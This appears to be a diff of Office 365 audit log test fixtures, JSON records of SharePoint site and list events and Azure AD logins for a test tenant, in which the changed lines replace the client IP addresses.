-{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} 
+{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.193","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} 
{"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} 
{"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} 
-{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
-{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams 
Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
-{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
-{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 
Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} 
-{"CreationTime":"2021-02-05T09:06:08","Id":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"f987e734-9f74-4996-8d75-6da73a443d22","IntraSystemId":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} 
-{"CreationTime":"2021-02-05T09:06:34","Id":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1","IntraSystemId":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} 
-{"CreationTime":"2021-02-05T09:06:07","Id":"f3bc8508-1130-4d82-b7c7-4c1292b98600","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0ff1-ce00-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 
Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"17b096b5-881a-4d72-8268-4854f9aa8910","IntraSystemId":"f3bc8508-1130-4d82-b7c7-4c1292b98600","SupportTicketId":"","Target":[{"ID":"00000002-0000-0ff1-ce00-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"00000002-0000-0ff1-ce00-000000000000","ErrorNumber":"0"} 
+{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b8
6-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
+{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 
